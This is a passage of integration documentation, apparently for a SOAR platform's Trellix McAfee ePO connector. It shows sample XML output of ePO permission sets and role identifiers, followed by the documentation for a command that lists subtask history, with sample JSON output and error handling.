		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.fullPerms</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.deploy.agent</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.audit.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.wakeup.agent</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.tag.assign</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.overRide</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.tagcat.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ubpRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ahRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.distViewOnly</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""3"">
		    <name>Group Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.user</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""4"">
		    <name>Executive Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.dir.access</roleUri>
		        <customRoleInfo roleFactoryId=""epo.dir"">
		          <systems>
		            <system>\</system>
		          </systems>
		        </customRoleInfo>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""5"">
		    <name>Group McAfee Investigator FW</name>
		    <roles>
		      <role>
		        <roleUri>role:copperfieldFw.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""6"">
		    <name>MCP Catalog Admin</name>
		    <roles>
		      <role>
		        <roleUri>role:MCPSRVER1000.MCPSRVER1000.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.data.general?catalogId=15e08086-c60e-4a69-93e4-a3be38b455f9&amp;itemTypeId8=perm.EDIT&amp;itemTypeId102=perm.EDIT&amp;itemTypeId201=perm.EDIT&amp;itemTypeId20=perm.EDIT</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&amp;itemTypeId8=perm.EDIT&amp;itemTypeId102=perm.EDIT&amp;itemTypeId201=perm.EDIT&amp;itemTypeId20=perm.EDIT</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.actions.general?exportFile=&amp;importFromCatalog=&amp;createCatalog=&amp;deleteCatalog=&amp;importFromFile=</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""7"">
		    <name>Group Active Response Editor</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.collectorRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""8"">
		    <name>Group Active Response Responder</name>
		    <roles>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""9"">
		    <name>Group Active Response Workspace Monitor</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.searchRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-workspace.workspace.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:tie.viewer</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""10"">
		    <name>Group Active Response Workspace Responder</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.reactionRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:tie.manager</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-workspace.workspace.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.run</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""11"">
		    <name>Global Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:ENDP_FW_META.ENDP_FW_META_FW.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:EPOAGENTMETA.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MVEDR___META.MVEDR___META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DLPPS___1000.DLPPS___1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MVEDR___META.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:issue.auditor?type=issue.type.untyped</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TIEMGMT_META.TIEMGMT_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:assessment.assessment.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DXLCLNT_META.DXLCLNT_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:softman.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_WP_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_GS_1000.ENDP_GS_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.dir.access</roleUri>
		        <customRoleInfo roleFactoryId=""epo.dir"">
		          <systems>
		            <system>\</system>
		          </systems>
		        </customRoleInfo>
		      </role>
		      <role>
		        <roleUri>role:ENDP_AM_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:EPOAGENTMETA.EPOAGENTMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ahRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:rs.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.audit.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DXLBROKRMETA.DXLBROKRMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_AM_1000.ENDP_AM_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TIEClientMETA.TIEClientMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:rollup.execute</roleUri>
		      </role>
		      <role>
		        <roleUri>role:UDLPSRVR2013.UDLPSRVR2013.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TELEMTRY1000.TELEMTRY1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MCPSRVER1000.MCPSRVER1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_WP_1000.ENDP_WP_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ubpRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.distViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.masterViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_GS_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MCA_____1000.MCA_____1000.reviewer</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""12"">
		    <name>TestPermissonSets</name>
		    <roles>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		</list>
		"
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
"<list id=""1"">  <permissionSet id=""2"">
		    <name>Group Admin</name>
		    <roles>
		      <role>
		        <roleUri>role:repoRole.masterViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.modify.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.fullPerms</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.deploy.agent</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.audit.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.wakeup.agent</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.tag.assign</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.overRide</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.tagcat.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ubpRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ahRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.distViewOnly</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""3"">
		    <name>Group Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.user</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""4"">
		    <name>Executive Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.dir.access</roleUri>
		        <customRoleInfo roleFactoryId=""epo.dir"">
		          <systems>
		            <system>\</system>
		          </systems>
		        </customRoleInfo>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""5"">
		    <name>Group McAfee Investigator FW</name>
		    <roles>
		      <role>
		        <roleUri>role:copperfieldFw.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""6"">
		    <name>MCP Catalog Admin</name>
		    <roles>
		      <role>
		        <roleUri>role:MCPSRVER1000.MCPSRVER1000.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.data.general?catalogId=15e08086-c60e-4a69-93e4-a3be38b455f9&amp;itemTypeId8=perm.EDIT&amp;itemTypeId102=perm.EDIT&amp;itemTypeId201=perm.EDIT&amp;itemTypeId20=perm.EDIT</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&amp;itemTypeId8=perm.EDIT&amp;itemTypeId102=perm.EDIT&amp;itemTypeId201=perm.EDIT&amp;itemTypeId20=perm.EDIT</roleUri>
		      </role>
		      <role>
		        <roleUri>role:common.catalog.actions.general?exportFile=&amp;importFromCatalog=&amp;createCatalog=&amp;deleteCatalog=&amp;importFromFile=</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""7"">
		    <name>Group Active Response Editor</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.collectorRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""8"">
		    <name>Group Active Response Responder</name>
		    <roles>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""9"">
		    <name>Group Active Response Workspace Monitor</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.searchRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-workspace.workspace.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:tie.viewer</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""10"">
		    <name>Group Active Response Workspace Responder</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.reactionRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:tie.manager</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-workspace.workspace.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.run</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""11"">
		    <name>Global Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:ENDP_FW_META.ENDP_FW_META_FW.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:EPOAGENTMETA.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MVEDR___META.MVEDR___META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DLPPS___1000.DLPPS___1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MVEDR___META.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:issue.auditor?type=issue.type.untyped</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TIEMGMT_META.TIEMGMT_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:assessment.assessment.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DXLCLNT_META.DXLCLNT_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:softman.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_WP_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_GS_1000.ENDP_GS_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.dir.access</roleUri>
		        <customRoleInfo roleFactoryId=""epo.dir"">
		          <systems>
		            <system>\</system>
		          </systems>
		        </customRoleInfo>
		      </role>
		      <role>
		        <roleUri>role:ENDP_AM_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:EPOAGENTMETA.EPOAGENTMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ahRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:rs.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.audit.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DXLBROKRMETA.DXLBROKRMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_AM_1000.ENDP_AM_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TIEClientMETA.TIEClientMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:rollup.execute</roleUri>
		      </role>
		      <role>
		        <roleUri>role:UDLPSRVR2013.UDLPSRVR2013.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TELEMTRY1000.TELEMTRY1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MCPSRVER1000.MCPSRVER1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_WP_1000.ENDP_WP_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ubpRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.distViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.masterViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_GS_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MCA_____1000.MCA_____1000.reviewer</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""12"">
		    <name>TestPermissonSets</name>
		    <roles>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		</list>
		"
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[]\"",
    "description": "\"[]\"",
    "enabled": "\"[]\"",
    "endDate": "\"[]\"",
    "id": "\"[]\"",
    "name": "\"[]\"",
    "nextRunTime": "\"[]\"",
    "startDate": "\"[]\"",
    "valid": "\"[]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
"; Group Admin role:repoRole.masterViewOnly role:epo.core.view.tree role:core.addressbook.admin role:core.dash.user role:epo.core.modify.tree role:response.rule.admin role:epo.productevents.view role:scheduler.view role:notes.fullPerms role:epo.core.deploy.agent role:core.audit.reviewer role:epo.event.view role:epo.core.wakeup.agent role:epo.core.tag.assign role:notes.overRide role:epo.core.tagcat.user role:core.query.user role:ubpRole.viewOnly role:ahRole.viewOnly role:repoRole.distViewOnly Group Reviewer role:core.addressbook.guest role:core.dash.viewer role:epo.productevents.view role:scheduler.view role:epo.event.view role:notes.viewOnly role:core.query.guest role:epo.core.view.tree role:response.rule.user Executive Reviewer role:epo.productevents.view role:core.query.guest role:epo.dir.access \ role:core.dash.viewer role:core.addressbook.guest role:epo.event.view Group McAfee Investigator FW role:copperfieldFw.write MCP Catalog Admin role:MCPSRVER1000.MCPSRVER1000.admin role:common.catalog.data.general?catalogId=15e08086-c60e-4a69-93e4-a3be38b455f9&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT role:common.catalog.actions.general?exportFile=&importFromCatalog=&createCatalog=&deleteCatalog=&importFromFile= Group Active Response Editor role:mar-server.collectorRole.write role:mar-server.triggerRole.write role:mar-server.searchRole.write role:MARCOBA_META.MARCOBA_META.admin role:mar-server.reactionRole.write Group Active Response Responder role:MARCOBA_META.MARCOBA_META.reviewer role:mar-server.reactionRole.read role:mar-server.collectorRole.read role:mar-server.triggerRole.read role:mar-server.searchRole.write Group Active Response Workspace Monitor role:mar-server.searchRole.read role:mar-workspace.workspace.read role:mar-server.collectorRole.read role:tie.viewer Group Active Response Workspace Responder role:mar-server.reactionRole.write role:tie.manager role:mar-server.collectorRole.write role:mar-server.triggerRole.write role:mar-workspace.workspace.write role:mar-server.searchRole.write role:mar-server.reactionRole.run Global Reviewer role:ENDP_FW_META.ENDP_FW_META_FW.reviewer role:EPOAGENTMETA.tasks.reviewer role:MVEDR___META.MVEDR___META.reviewer role:DLPPS___1000.DLPPS___1000.reviewer role:epo.core.view.tree role:core.dash.viewer role:MVEDR___META.tasks.reviewer role:MARCOBA_META.MARCOBA_META.reviewer role:response.rule.admin role:issue.auditor?type=issue.type.untyped role:TIEMGMT_META.TIEMGMT_META.reviewer role:assessment.assessment.reviewer role:MARCOBA_META.tasks.reviewer role:DXLCLNT_META.DXLCLNT_META.reviewer role:softman.viewOnly role:ENDP_WP_1000.tasks.reviewer role:ENDP_GS_1000.ENDP_GS_1000.reviewer role:epo.dir.access \ role:ENDP_AM_1000.tasks.reviewer role:EPOAGENTMETA.EPOAGENTMETA.reviewer role:ahRole.viewOnly role:rs.user role:core.audit.reviewer role:DXLBROKRMETA.DXLBROKRMETA.reviewer role:core.query.guest role:ENDP_AM_1000.ENDP_AM_1000.reviewer role:TIEClientMETA.TIEClientMETA.reviewer role:rollup.execute role:UDLPSRVR2013.UDLPSRVR2013.reviewer role:TELEMTRY1000.TELEMTRY1000.reviewer role:core.addressbook.guest role:MCPSRVER1000.MCPSRVER1000.reviewer role:ENDP_WP_1000.ENDP_WP_1000.reviewer role:epo.productevents.view role:ubpRole.viewOnly role:repoRole.distViewOnly role:epo.event.view role:notes.viewOnly role:scheduler.view role:repoRole.masterViewOnly role:ENDP_GS_1000.tasks.reviewer role:MCA_____1000.MCA_____1000.reviewer TestPermissonSets

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

List Running Server Task failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

List Running Server Task failed.

Status Code: 401.

Message: Unauthorized.

List Sub Task History

Retrieves a list of subtask history based on the provided task log ID.

Reader Note

Task Log ID is a required parameter to run this command.

  • Run the List Running Server Task command to obtain Task Log ID. Task Log IDs can be found in the returned raw data at the path $[*].taskLogId.

Input

Input Parameter

Required/Optional

Description

Example

Task Log ID

Required

The ID of the task log to retrieve corresponding subtask history. Task log IDs can be obtained using the List Running Server Task command.

8*****7

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "name": "Send DXL Event",
        "startDate": "2019-11-25T14:07:50-08:00",
        "endDate": "2019-11-25T14:07:50-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "name": "Send Email",
        "startDate": "2019-11-25T14:07:50-08:00",
        "endDate": "2019-11-25T14:07:50-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "name": "Send DXL Event",
        "startDate": "2019-11-25T14:07:50-08:00",
        "endDate": "2019-11-25T14:07:50-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "name": "Send Email",
        "startDate": "2019-11-25T14:07:50-08:00",
        "endDate": "2019-11-25T14:07:50-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"name\\\": \\\"Computer Name: DXL\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-06T13:08:48-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T14:00:01-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Failed\\\",\\r\\n        \\\"taskSource\\\": \\\"runNowTaskSource\\\",\\r\\n        \\\"duration\\\": \\\"48 hours 51 minutes\\\"\\r\\n    }\\r\\n]\"",
    "duration": "\"[\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\"\\r\\n \\r\\n ]\"",
    "endDate": "\"[\\r\\n \\r\\n  \\\"2019-11-25T14:07:50-08:00\\\",\\r\\n \\r\\n  \\\"2019-11-25T14:07:50-08:00\\\"\\r\\n \\r\\n ]\"",
    "name": "\"[\\r\\n \\r\\n  \\\"Send DXL Event\\\",\\r\\n \\r\\n  \\\"Send Email\\\"\\r\\n \\r\\n ]\"",
    "startDate": "\"[\\r\\n \\r\\n  \\\"2019-11-25T14:07:50-08:00\\\",\\r\\n \\r\\n  \\\"2019-11-25T14:07:50-08:00\\\"\\r\\n \\r\\n ]\"",
    "status": "\"[\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\"\\r\\n \\r\\n ]\"",
    "taskSource": "\"[\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\"\\r\\n \\r\\n ]\"",
    "userName": "\"[\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

